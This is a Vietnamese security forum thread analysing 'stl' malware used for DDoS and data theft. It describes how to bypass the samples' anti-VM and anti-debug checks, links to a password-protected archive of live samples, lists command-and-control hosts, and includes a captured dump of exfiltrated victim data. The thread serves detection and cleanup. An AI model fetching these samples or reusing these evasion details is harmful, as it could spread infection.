
lẻ nào em đag được mỡ mang tầm Mắt, 1 năm trước khi học môn Lập trình hệ thống,ghép nối thiết bị, E biết HĐHành bây giờ là đa nhiêm,nhưng quá trình xử lí thông tin lại là " xếp hàng đợi" là được thực hiện thứ tự lần lượt Lúc đó em mơ màng về một định nghĩa Nếu các Antivirut được cài chung với virut,nhưng virut sẻ đủ " khôn" để biết khi nào các process của các Anti chạy mà Sleep và ngược lại thì sao nhỉ, đang chờ đợi và theo " sỏi" Anh TQN

Phân tích tính chất vài trận DDoS HVA vừa qua.

Xr0.9999 — GMT

quá hay, vào HVA học hỏi đc rất nhiều điều. em khâm phục các bác quá !

Phân tích tính chất vài trận DDoS HVA vừa qua.

soida — GMT

Vậy, mình chạy malware trong 1 máy ảo, ngoài máy thật bật chương trình Wireshake thì nó có phát hiện được không nhỉ :-S

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Dĩ nhiên là không, vì ToolHelp32 API chỉ detect trên 1 session (có nhiều session trong 1 máy), và máy thật khác máy ảo.

Phân tích tính chất vài trận DDoS HVA vừa qua.

stf — GMT

soida wrote:

Vậy, mình chạy malware trong 1 máy ảo, ngoài máy thật bật chương trình Wireshake thì nó có phát hiện được không nhỉ

TQN wrote:

Dĩ nhiên là không, vì ToolHelp32 API chỉ detect trên 1 session (có nhiều session trong 1 máy), và máy thật khác máy ảo.

Hai bác định vẽ đường cho hươu chạy sao ;) vì hình như cũng có cái gọi là VMware detection...lúc đó bọn STL lại thêm 1 đoạn code check nếu là VM thì "chém vè" tiếp...keke

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tụi stl này đã code detect VM từ lâu rồi, 2010, nhưng những đoạn code check đó lại trò con nít, user bình thường doubleclick to run trên VM mới bị detect, chứ còn gặp các anh em biết về RCE thì chỉ cần change khi debug hay patch một cái EAX, AX, AL hay ZF là đoạn code check của mấy anh stl thành vô dụng. Kỹ thuật anti Debug, anti VM, anti RCE của mấy anh stl chỉ mới ở mức hơn newbie một chút thôi. Vd: 1. File rwoqv.exe, addr: 00401230, là đoạn code check VMWare và VirtualBox 2. File rfc2616.exe, addr: 00401680, một proc call một loạt các hàm check Virtual Machine, AV và debugger.

Theo hình trên, tại 004016D3, em cứ để mấy anh stl múa sao thì múa, em chỉ cần set result về 0 là "xong phim", bao nhiêu công sức code của mấy anh đổ sông đổ biển hết -:-)

Trong file QTTask.zip mà tui đã up ở mediafire: http://www.mediafire.com/?259kv56xit09c6b (password: infected) có các file IDA 6.1 database file .idb, các bạn có thể mở ra với IDA 6.1 và xem các .idb đó như một tham khảo thêm ! PS: Chiều nay ngồi RCE một con virus của Nga mà một thằng bên Kaspersky lab gởi cho mình. RCE một đổi, mình nổi khùng, mẹ, sao có thằng giỏi thế không biết, nó quay mình chóng mặt luôn, dẹp luôn, bỏ đi nhậu "rữa xe" cho khoẻ ! Chả liên quan gì tới mình ! Tiện thể, nhờ bà con up giùm các file trong QTTask.zip trên lên các AVs. Cùng nhau up phụ một tay nhé ! Có một điều nữa, từ trước tới giờ, đa số bà con chỉ biết Wireshark và Ethernet là các tool phổ biến để sniffer và packet capture, monitor... Chỉ gần đây anh em ta mới đề cập tới SmartSniff (smsniff.exe) của Nirosoft. Anh em stl cũng theo topic này rất sát, thấy, à mày dùng smsniff hả, tao chơi code detect smsniff cho mày biết ! Em chỉ cần, vẫn dùng smsniff.exe, đổi tên nó thành nwsniff.exe chẵng hạn, rồi dùng 1 HexEditor, search và replace SmartSniff string thành NetworkSniff string chẳng hạn, thì đoạn code detect SmartSniff của mấy anh stl vứt vào sọt rác luôn (FindWindowW tìm ra không mấy anh stl ?). Khi nào mấy anh stl cần học cờ rắc, liên hệ em hay anh em REA, HVA nhé ! Học phí cực rẽ luôn !

Phân tích tính chất vài trận DDoS HVA vừa qua.

wireless — GMT

Vậy cuộc chiến náy khi nào sẽ kết thúc đậy ? Những thằng ABC phải chịu trận hả trờii.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tại sao bạn lại gọi là cuộc chiến, và nếu là cuộc chiến thì nó chỉ kết thúc khi stl giải tán, hay stl không còn viết "mèo què" nữa, không còn ăn cắp thông tin, "bạch hoá" hèn hạ, không còn chơi DDOS dơ bẩn nữa ! Bạn đừng nên nghĩ mình là ABC đứng giữa chịu đòn của stl, bạn hảy đứng về một phía, về HVA, về phía anh em IT, cộng đồng chính nghĩa để đấu tranh, đập tan cái tổ chức xấu xa stl này ! Em còn chưa mệt thì sao bạn lại mệt, lại hỏi như vậy ha ? Tới giờ thì em rút ra kn rồi, RCE mèo què của stl và post bài trên HVA này như một cách giải trí, ôn luyện, nâng cao khả năng RCE "nữa mùa" của em thôi !

Phân tích tính chất vài trận DDoS HVA vừa qua.

tmd — GMT

STL lợi dụng những hệ thống bị "compromised" về an ninh để có được 1 mớ zombie rất lớn. Những hệ thống như vậy là hằng hà sa số ở trong nước. Rất dễ có hệ thống zombie với IDM crack, vietkey,..key không rõ nguồn, software crack, office crack, windows crack... Các bạn STL chế hàng, nhét vào software kèm crack, nhét lên các trang chia sẽ software không bản quyền. Chỉ vậy thôi là đủ. Mấy thằng IT ở các cty bị compromised đó đâu cần biết chuyện DDOS là gì, chỉ cần có software không bị kiểm tra bản quyền, có IDM xịn là đủ. Mấy nội ISP đâu cần quan tâm tới tụi reseller làm gì với khách hàng, cứ để 1 server hàng chục domain. Dính hàng đâu đó, lây 1 phát qua đám bên cạnh, là cái server hay đám server đó thành tay sai trung gian cho các đầu nậu DDOS,(stl chăng hạn). ... Cuộc chiến này là loại một chiều David chống lại Goliath không có phần thắng như trong truyện.

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel-pc — GMT

Anh em stl cũng theo topic này rất sát, thấy, à mày dùng smsniff hả, tao chơi code detect smsniff cho mày biết !

hic hic, mình chiều về là khoảng 30 p là vào coi topic này, nghe anh nói chắc không dám vào :)), không khéo lại bị nghi là stl :))

Phân tích tính chất vài trận DDoS HVA vừa qua.

A.T — GMT

qa cách hướng dẩn của các cao thủ trên mà ta chưa rút ra được cái gì cho Mình thì buồn,em rút ra được các cách sau mong các Anh chỉ giáo thêm. i.PC dùng ở Nhà. 1.gỡ ngay mấy cái IDM crack,Unikey,phần mềm đọc file pfd.....download bản sạch đúng nguồn về mà dùng 2.dùng một Anti quyét sạch toàn bộ hệ thống,cập nhật thường xuyên 3.kiểm tra máy tính các để chế độ securi level cao,kiểm tra kỹ các port đang giao tiếp,lắng nghe với bên ngoài bằng các tool cần thiết ii.Server,rất nhiều máy trạm ở công ty.. 1.Các quản trị viên kiểm tra kỹ đê cái ,biết đâu ông đang là zombie cho stl đấy, 2.Các ông lắm tool mornitor..sniff lắm kia mà.. 3.cập nhật cái gì thì cập nhật đê ps: -E mạo phép nói như trên mong các Bác tha lổi,em nghỉ đây là việc nên làm của cả Cộng Đồng IT cùng chung tay,để mấy Anh HVA làm một mình,Mình ngồi đọc mà k làm gì...dù gì cũng là IT làm việc đó nó cũng ko khó,hơn là vô tình tiếp tay cho những Kẻ có ý đồ ko tốt được.E cũng hack cái này hack cái kia,nhưng zui zui thôi,chả hại ai mà làm gì,mổi lần thế lại ngẩm đc vài điều. - Mấy Anh sinh tử lệnh đừng có đụng vào em nhé,E tuơng lai còn sáng,ra Trường còn fai kiếm tiền trả tiền học và phụng dưỡng Bme ở quê nữa. :^)

Phân tích tính chất vài trận DDoS HVA vừa qua.

love.exe — GMT

thui em cứ sài KIS bản quyền cho chắc hết lại gom tiền mua chứ sài mấy cái kia nguy hiểm quá thấy mấy anh phân tich nhìn đã thiệt mà cũng chả hiểu gì cho lắm hehe....

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

stf wrote:

soida wrote:

Vậy, mình chạy malware trong 1 máy ảo, ngoài máy thật bật chương trình Wireshake thì nó có phát hiện được không nhỉ

TQN wrote:

Dĩ nhiên là không, vì ToolHelp32 API chỉ detect trên 1 session (có nhiều session trong 1 máy), và máy thật khác máy ảo.
Hai bác định vẽ đường cho hươu chạy sao ;) vì hình như cũng có cái gọi là VMware detection...lúc đó bọn STL lại thêm 1 đoạn code check nếu là VM thì "chém vè" tiếp...keke

Hì hì, tớ nghĩ (và chắc TQN cũng nghĩ) là chả có gì là vẽ đường cho hươu chạy hết bởi vì nói cho cùng, tất cả đều là kiến thức và ứng dụng, chỉ có khác ở chỗ ứng dụng kiến thức để giúp cho xã hội, cho trí tuệ, cho con người được tốt đẹp hơn hay là làm cho nó tan nát hơn thì tuỳ. HVA chơi rất đường đường chính chính, phân tích rất kỹ thuật, có bằng chứng, có minh hoạ rất rõ ràng. Cái này không phải chỉ riêng cho mấy anh stl mà còn cho công luận đọc và hiểu một cách rộng rãi. Nếu "hươu" chỉ có thể "chạy" một đường, một kiểu, một lối mòn tư duy thì chẳng bao lâu, "hươu" sẽ đâm vô ngõ cụt. Nếu "hươu" mà thoảt ra khỏi lối mòn tư duy, mở rộng tầm nhìn nhưng vẫn cắn răng làm những chuyện bậy bạ thì để cho toà án lương tâm xử... "hươu". Cho đến nay, "hươu" đã đi đến chỗ bế tắc gần như hoàn toàn. Vẫn loay hoay trong cái hộp mà không thoát ra được nhưng tệ nhất là càng ngày càng đắm chìm vào những trò che đậy tồi tệ không những trong kỹ thuật mà còn trong đời sống nữa. Tớ không hiểu nổi, mấy anh stl đang phục vụ cái gì?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Lại thành thật chia buồn với mấy anh stl nữa rồi, 6 cái host URL mấy anh nhúng trong cversions.2.db mà mấy anh đã cẩn thận dùng TEA/TEAN gì đó để encrypt đã bị em decrypt ra mất tiêu rồi :-( Trước tiên, em patch cái hàm check sniffers của mấy anh để nó luôn return FALSE và set cái global flag g_bNotSafeToConnect to FALSE (thông cảm, tiếng Anh em tệ lắm, đặt tên biến, tên hàm đọc muốn trẹo mồm). Sau đó, do mấy anh cứ khoái dùng Sleep để ngủ nên em phải patch luôn hàm Sleep trong kernel32.luôn, cho nó ret 4 ở đầu hàm (để em khỏi phải ngủ theo mấy anh :-)). Tiếp theo, em đặt breakpoint ở hàm CreateProcessA và W trong kernel32.dll luôn (đề phòng thôi, vì anti rookit tool em đang dùng đã set deny CreateProcess, LoadLibrary, create service... rồi mà), sau đó em cứ từ từ mà trace qua hàm MainThreadProc trong DllMain của mấy anh, thế là lòi ra hết. Mấy anh stl coder sẽ "thét mét", quái, làm sao mà thằng TQN biết là có 6, nếu nó dùng sniffer thì chỉ detect ra 1 host đang connect thôi chứ ? Đơn giản mà, mấy anh dùng vòng loop 30 lần, lấy random value bằng hàm rand rồi mod 6 thì bất kỳ thằng coder newbie nào như em mà không biết là sẽ lấy được trị là 0 tới 5 (tức tổng cộng là 6). Thay vì để hàm rand của VC++ 2008 RTL được call, em patch luôn, cho ECX trả về từ 0 - 30 y như số lần for loop của mấy anh luôn ! Vậy thì cứ watch cái buffer truyền vào cho hàm decode của mấy anh là ra hết cái đống URL host của mấy anh thôi, có gì đâu ! Danh sách các host của stl mà con trojan, ăn cắp thông tin, upload thông tin victim về, và cũng là downloader để download các "mèo què" mới của stl về: 1. alligator.buyshouses.net 2. examiner.thruhere.net 3. gssiweb.is-a-chef.net 4. tmz.is-found.org 5. wbir.iamallama.com 6. weei.istmein.de Trong mấy cái host này, có cái của Malaisia, có cái của Đức, tùm lum hết. Kinh thiệt, mấy anh stl giàu quá. -:|- Các host này mở sẵn port 443 để trojan upload thông tin của victim về. Em nhờ bà con report baduse để mấy cái host này die sớm. Được vậy thì mọi người dùng Internet, dân IT VN ta đỡ khổ, đỡ bị "bạch hoá" hay bắt buộc đi "tắm trắng" =)) Bà con IT admin ở các cơ quan, công ty, trường học... chịu khó set firewall, IPS hay IDS gì đó để detect các connection in, out tới các host trên. Nếu có, chia buồn, dính "mèo què" của stl rồi ! Đám mèo què này hơi khó xoá khi boot vào Windows bình thường, bà con chịu khó dùng Hiren Boot disk để boot và xoá từng file trong danh sách các file trong QTTask.zip mà em đã up trên mediafire nhé ! PS: Bà con thắc mắc, anh em HVA có chỉ đường cho "hươu" chạy không, về các anh em khác thì em không dám nói, riêng bản thân em, thì em xin nói thật, là không ! Vì con hươu này còn nhỏ lắm, nên chỉ chạy lòng vòng thôi. Từ đầu tới giờ, có nhiều cái em không dám viết ra, vì nếu viết ra mà mấy anh stl áp dụng thì em cũng chạy "lòng vòng" rồi "cắm đầu" luôn, nên chỉ dám nghĩ trong đầu thôi, không dám nói và tới giờ, may cho em quá, mấy anh stl coder chưa đi mấy con đường đấy, "phào", khoẻ :-) Còn chuyện RCE và phân tích code của mấy anh stl thì em nghĩ đơn giản là giống như anh em HVA ta đang viết các bài báo phân tích kỹ thuật để mọi người, mọi coder, reverser... đọc giải trí, không bổ bề này cũng bổ bề kia thôi. Những kỹ thuật mà mấy anh stl đang dùng chả có gì là tinh vi như báo, đài nói cả, chỉ là code VC++ bình thường thôi, giả "hươu, nai" thôi ! Chỉ cần chút "xíu xíu" kinh nghiện RCE VC++ application là ra tất. Sau này em sẽ post topic hướng dẫn RCE VC++ app, bà con đón đọc nhé. Các kỹ thuật trong đó em cũng học hỏi từ các guru, sư phụ RCE của em như Kaspersky, Kayaker, Ilfak, Igor... thôi ! Ngày hôm qua em gặp mẫu của thằng Nga, dùng RPC để lây lan, em thiệt bó tay, té xỉu luôn ! Chả hiểu nó viết cái gì, vì về code nó đã là thằng coder cao tay hơn mình rồi ! Sau cùng, phải nhờ anh Gấu gồ, anh ấy chỉ ra là nó khai thác lổi của Print Spooler.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Và em cũng chắc chắn là trong đám host này, có thằng đang nhả bot để DDOS VNN về. Em sẽ post cách hướng dẫn chạy một mình cversions.2.db với OllyDbg, SmartSniff và SysTracer trên máy ảo để bà con chụp cổ thằng bot VNN được down về. Em nói đúng không mấy anh stl ? Các thông tin về victim, về cấu hình phần cứng, serial number của CPU, harddisk, username, computername, licenseID, danh sách các phần mềm đã instal, IE ver, path, name của thư mục %UserProfile%... mà mấy anh còn lấy được, còn úp về được thì victim hết đường chối khi mấy anh muốn "bạch hoá". Thậm chí em đang run những phần mềm nào trên máy, mấy anh còn lấy list luôn (PSAPI hay ToolHelp32 API), dùng EnumWindows hết tất cả window đang mở rồi ghi xuống Global Temp File của mấy anh (so siếc, encode gì đó xong) rồi để up đi thì còn cái gì của victim mà mấy anh không biết nữa ? Mấy anh đang vi phạm trắng trợn quyền bảo mật thông tin của công dân đấy nhé ! Nếu trong đám coder của mấy anh, thằng nào dùng WMI để lấy thông tin phần cứng của victim, nhắc với nó, em chỉ cần search vài forum trong nước là khoanh vùng thằng đó rồi đấy nhé ! Đang dùng pure C, lại nhảy qua dùng CString, rồi module khác dùng WMI lại dùng com_string, com_bstr...., rồi module khác lại dùng Zlib.... Chã lẽ một cái file cversions.2.db có tới 2, 3 thằng tham gia code à ? Bà con có tự hỏi, đám "mèo què" này từ trên trời rơi xuống không ? Hoàn toàn không, nội cái tiền thuê mướn, trả lương cho đám coder này từ 2010 tới giờ thì bà con biết là bao nhiêu rồi, ít nhất phải có từ 4 coder trở lên. Bà con tính lương giùm em cái, tụi này hơi cao cấp, chắc có "du côn sinh" nữa, nên lương phải hơi cao cao, 700USD một tháng đi ! Còn nếu đi thuê các công ty chuyên viết malware thì càng chết nữa, 1 man month chắc phải 1k5-2k USD. Nhưng mà buồn một cái là tới giời, thả ra con nào là các AV chụp cổ nhai xương hết con đó, bao nhiều tiền của, công sức đổ sông đổ biển hết ! Em xin chia buồn mấy anh coder stl nhé, thành thật đấy. Nếu với tài năng coding của mấy anh mà dùng để viết các phần mềm có ích, bán rẽ thì bây giờ mấy anh vi vu biệt thự PMH, xe hơi rồi !

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Dưới đây là một đoạn thông tin của victim mà con cversions.2.db gởi về cho cái host ở Malaisia: Code:

==================================================
Protocol          : TCP
Remote Address    : 111.90.149.58
Remote Port       : 443
Service Name      : https
Packets           : 31  {17 ; 14}
Data Size         : 15,115 Bytes  {7,501 ; 7,614}
Total Size        : 16,399 Bytes  {8,181 ; 8,218}
Data Speed        : 0.1 KB/Sec
Duration          : 00:02:03.812
ProcessID         : 4076
Remote MAC Address: 00-22-6b-f4-bc-a9
Remote IP Country : Malaysia
==================================================

[27/09/2011 3:13:17 PM:687]
00000000  67 00 00 00 00                                                                                       g....

[27/09/2011 3:13:17 PM:765]
00000000  81 8D 68 B2 31 23 90 1F  21 9E 55 59 B5 30 A5 C4  07 97 53 2F 37 72 72 44  55 AC 1C 0F 0E 47 8E 94   h²1#. !žUYµ0¥Ä .—S/7rrD U¬...GŽ”
00000020  96 21 24 A8 BA B3 0B E8  23 94 18 4B 73 18 2E 14  5C 8F C2 02 D7 7B E6 0E  1A 23 5D 85 06 80 11 DA   –!$¨º³.è #”.Ks... \Â.×{æ. .#]….€.Ú
00000040  0F C0 C2 93 0B FD 09 53  8B 6B 0C A2 5A 27 D1 3D  7D 07 B2 7E 84 8C BD 1A  3A 16 8D 97 56 86 E2 A2   .ÀÂ“.ý.S ‹k.¢Z'Ñ= }.²~„Œ½. :.—V†â¢
00000060  83 3D 3B B2                                                                                          ƒ=;²

[27/09/2011 3:13:17 PM:765]
00000000  81 8E 6A B5 35 28 96 26  29 A7 5F 64 C1 3D B3 D3  17 A8 65 42 4B 87 88 5B  6D C5 36 2A 2A 64 AC B3   Žjµ5(–& )§_dÁ=³Ó .¨eBK‡ˆ[ mÅ6**d¬³
00000020  B6 42 46 CB DE D8 31 0F  4B BD 42 76 9F 45 5C 43  8C C0 F4 35 0B B0 1C 45  52 5C 97 C0 42 BD 4F 19   ¶BFËÞØ1. K½BvŸE\C ŒÀô5.°.E R\—ÀB½O.
00000040  4F 01 04 D6 4F 42 4F 9A  D3 B4 56 ED A6 74 1F 8C  CD 58 04 D1 D8 E1 13 71  92 6F E7 F2 B2 E3 40 01   O..ÖOBOš Ó´Ví¦t.Œ ÍX.ÑØá.q ’oçò²ã@.
00000060  E3 9E 9D 15                                                                                          ãž.

[27/09/2011 3:13:17 PM:859]
00000000  00                                                                                                   .

[27/09/2011 3:13:18 PM:046]
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE.EEE-YEE-YEEEEEEEEEEEEEE/.---/[X%-\\+(Y%\,_,X\Y,^(\%X)-[/-,__0_^--0---,-%^X)\X-)**Y^\^[----,+%[.-.(-.,.EMNM..mk.^'AIxpmAO^XAKtohnALII|nvAMX[tqxnA~kxontrsn3ts.(*%)$-+(.F(3,3/+--@=0=NM=.=0=MI=,=0=NP=/(+=0=UY=_-)\*X$Y=0=ST^=--'-\'(X'/,'__'$+=0=_|t=PY--%--0_WYJ3PJ-JP\P$..$//.*=====.-y=,u=.p=a=----0--0--=--'--'--.RdmLLYO-$~PvUM+RLMS_Iz  BmXhTMnwQjNv*gSh)vZX+Hz  3FB@FB@FB@39\yrx=[q|nu=Mq|dxo=,-=\~itkxE..\yrx=[q|nu=Mq|dxo=,-=Mqhzts.._r~un=/3)3+=5oxprkx=rsqd4.._rrni=Qto|otxn={ro=^66_htqyxo=/-,-..^rmxost~=Yxnvirm=Nx|o~u=0=Urpx..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Y|i||nx=M|~v..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Uxqm=Ndnixp..Xp|o~|yxor=O\Y=Nihytr=/-,-..UM=Q|nxoWxi=P,.,$=P[M=Nxotxn..V|nmxonvd=\sit0Ktohn=/-,,..Tsixosxi=Xemqroxo..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/)*+)$-4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(-.++(4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(-*$.%4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=Tsixosxi=Xemqroxo=%=5V_/(.-()%4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(.((,/4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(.+/*+4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(.+/*+0k/4..Hmy|ix={ro=Jtsyrjn=EM=5V_/(),*+.4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=Tsixosxi=Xemqroxo=%=5V_/())(/,4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/())%$.4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/((($,*4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=Tsixosxi=Xemqroxo=%=5V_/(($-)$4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(+/$.*4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(++)()4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(+*+%-4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(*-///4..Uri{te={ro=Jtsyrjn=EM=5V_/(*-*$,4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(*-$)*4..Hmy|ix={ro=Jtsyrjn=EM=5V_/+-**,/4..Hmy|ix={ro=Jtsyrjn=EM=5V_/+,++*+4..Pt~ornr{i=Jtsyrjn=Yotkxo=Vti=*3,3-3*+--..V0Qtix=Pxz|=^ryx~=M|~v=)3%3(..Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,..Pt~ornr{i=Ktnh|q=W>=/3-=Oxytniothi|qx=M|~v|zx..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=Irrqn=0=XSH..Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH..Prgtqq|=[tox{re=+3-3/=5e%+=xs0HN4..PNYS=Qto|od={ro=Ktnh|q=Nihytr=/--%=0=XSH..Pt~ornr{i=Ixei0ir0Nmxx~u=Xsztsx=)3-=5Xszqtnu4..Mdiurs=/3*=mdjts./0/,+..O|kx=Oxmroin=*3*3-=_X..HstVxd=)3-=SI..Pt~ornr{i=Vxosxq0Pryx=Yotkxo=[o|pxjrov=[x|ihox=M|~v=,3(..JtsM~|m=)3,3/..JtsO\O=|o~utkxo..D|urr<=Pxnnxszxo..Pt~ornr{i=Ktnh|q=^66=/--%=\IQ=Hmy|ix=v$*.$/)=0=e%+=$3-3.-*/$3),)%..UIVV..nxsnron|pmqxn..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=3SXI=[o|pxjrov=Irrqn=0=xsh..ktni|qtnBe+){ox..jy{irrqnBt|+){ox..Q|~=Ktxi=piy$=XK\..sxijrovqto|otxnBt|+){ox..ir|nixopxi|y|i|m|~v|zxn|pmqx..ts{n|pmqxBe+){ox..sxijrovqto|otxnBe%+{ox..yn{n|pmqxn..nxihmn|pmqxn..P|ovxiOxnx|o~u..nxihmirrqnBe+){ox..Pt~ornr{i=Ktnh|q=^66=/-,-==e%+=Oxytniothi|qx=0=,-3-3.-.,$..tp|ztszirrqnBe%+{ox..msmirrqnBe+){ox..mrjxop|s|zxpxsiBt|+){ox..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3.-*/$3),)%..ux|yxon..[|eNxihmTsni|qqxo..W|k|5IP4=+=Hmy|ix=/+..qhxirriun|pmqxn..|hytrn|pmqxn..zxsxo|qirrqnBt|+){ox..ktni|qtnBt|+){ox..Mdiurs=/3*3,..htqyirrqnBe%+{ox..r{{oxzBt|+){ox..io|~tszirrqBe+){ox..irrqnBt|+){ox..motsiirrqnBt|+){ox..motsiirrqnBe+){ox..PNYS=Qto|od={ro=Ktnh|q=Nihytr=/--%=0=XSH..irrqtsyxe..io|~tszirrqBt|+){ox..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=^rqqx~itrs=Irrqn=Nrho~x=^|~ux..yxhz{tqxnBjts*..io|~tszirrqBe%+{ox..ummhnzP,.,-..zxsxo|qn|pmqxn..ir|nixon|pmqx..{tox{qdn|pmqx..xkxsin|pmqx..trpxiot~n|pmqxn..W|k|=\hir=Hmy|ixo..qtnBe+){ox..tp|ztszirrqnBt|+){ox..m{yBe+){ox..jsxiqtnBe+){ox..~|s~xqn|pmqx..qhxirriuirrqnBe+){ox..~uvts{irrqBe%+{ox..jy{irrqnBe%+{ox..ntyxnurjn|pmqxn..ox|ypx..sxijrovn|pmqxn..PNEPQ=+=Nxokt~x=M|~v=/=5V_$*.+%+4..mroitrn|pmqx..trpxiot~irrqnBe%+{ox..Ro|~qx=KP=Ktoih|q_re=)3-3,/..niro|zxn|pmqxn..hnn|pmqxn..np|oi~|oyn|pmqxn..|kniox|pirrqnBe%+{ox..jsxiqtnBt|+){ox.._rrni=Qto|otxn={ro=^66_htqyxo=/--$..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=NYV=Ox{xoxs~x=\nnxpqtxn=|sy=TsixqqtNxsnx..ton|pmqxn..V|nmxonvd=Tsixosxi=Nx~hotid=/-,,..msmirrqnBe%+{ox..Pt~ornr{i=Yr~hpxsi=Xemqroxo=/--%..Pt~ornr{i=Ktnh|q=W>=/3-=Oxytniothi|qx=M|~v|zx..niox|ppxyt|n|pmqxn..r{{oxzBe%+{ox..Pt~ornr{i=Ktnh|q=^66=/--(=Oxytniothi|qx..hnn|pmqxn..yokirrqnBt|+){ox..Ox~xtkxTsni|qqxo..UM=Q|nxoWxi=Irrqre..Pt~ornr{i=Ktnh|q=^66=/--(=\IQ=Hmy|ix=v$*.$/.=0=e%+=%3-3(-*/*3)-(...Ktnh|q=^66=/--%=e%+=Ohsitpx=0=5k$3-3.-*/$3),)%4..Ktnh|q=^66=/--%=e%+=Ohsitpx=0=k$3-3.-*/$3),)%..ts{n|pmqxBe%+{ox..Nr{ij|ox=Hmy|ix={ro=Jx=[rqyxon..Pt~ornr{i=Jtsyrjn=Yotkxo=Vti=Yr~hpxsi|itrs=*+--3-$,/-,..y{eBt|+){ox..Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH..Nx~hotid=Hmy|ix={ro=Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH=5V_//(,)%*4..Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH=Nxokt~x=M|~v=,=5V_$)(,)-4..Uri{te={ro=Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH=5V_$*,-$/4..xksiyokn|pmqx..m{yBe%+{ox..Yxhzztsz=Irrqn={ro=Jtsyrjn=5e%+4..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=Ux|yxon=|sy=Qto|otxn..jmyirrqnBe%+{ox..PNEPQ=)3-=NM/=5V_$()).-4..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=V_/)+*,*)=0=e%+=$3-3.-*/$3((*-..y{eBe%+{ox..Pt~ornr{i=Ntqkxoqtzui..Tsixq5O4=Xeioxpx=Zo|mut~n=/=Yotkxo..nxihmirrqnBe%+{ox..irrqnBe+){ox..yokirrqnBe%+{ox..Pt~ornr{i=R{{t~x=Mor{xnntrs|q=Xytitrs=/--...^rpm|ittqtid=M|~v={ro=iux=/--*=R{{t~x=ndnixp..utyBtsmhin|pmqxn..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=Irrqn=0=XSH..tr~iqn|pmqx.._rrni=Qto|otxn={ro=^66_htqyxo=/-,-..Pt~ornr{i=\mmqt~|itrs=Xooro=Oxmroitsz..UM=Q|nxoWxi=P,.,$=P[M=Nxotxn=Irrqre..utyn|pmqxtsmhi..y{eBe+){ox..mrjxop|s|zxpxsiBe%+{ox..htqyn|pmqxn..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3.-*/$3,*..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3.-*/$3+,+,..jemqtnBe%+{ox..zxsxo|qirrqnBe+){ox..\QMN=Irh~u=M|y=Yotkxo..hpy{n|pmqxn..Pt~ornr{i=3SXI=[o|pxjrov=.3-=Nxokt~x=M|~v=/..ytnmq|dn|pmqxn..ts{n|pmqxBt|+){ox..PokqHnzIo|~vtsz..qhxirriuirrqnBe%+{ox..tp|ztszirrqnBe+){ox..Xp|o~|yxor=O\Y=Nihytr=/-,-..jnyirrqBe%+{ox..yokirrqnBe+){ox..jmyn|pmqxn..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=NM,=Jts./=Irrqn..nxihmirrqnBt|+){ox..mrjxop|s|zxpxsiBe+){ox..motsiirrqnBe%+{ox..qtnBe%+{ox..jptn|pmqxn..|kniox|pirrqnBt|+){ox..|kniox|pirrqnBe+){ox..msmmroinn|pmqx..YN[0VtiNxihm..t{nn|pmqxn..Pt~ornr{i=3SXI=[o|pxjrov=/3-=Nxokt~x=M|~v=/..njihsxo..utyn|pmqxn..N~|s=Ir..[|eNxsyTsni|qqxo..OX\QIXV=ZX=;=[X=Xiuxosxi=M^T0X=ST^=Yotkxo..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=NM,=Irrqn..r|~oBe%+{ox..irrqnBe%+{ox..Pt~orn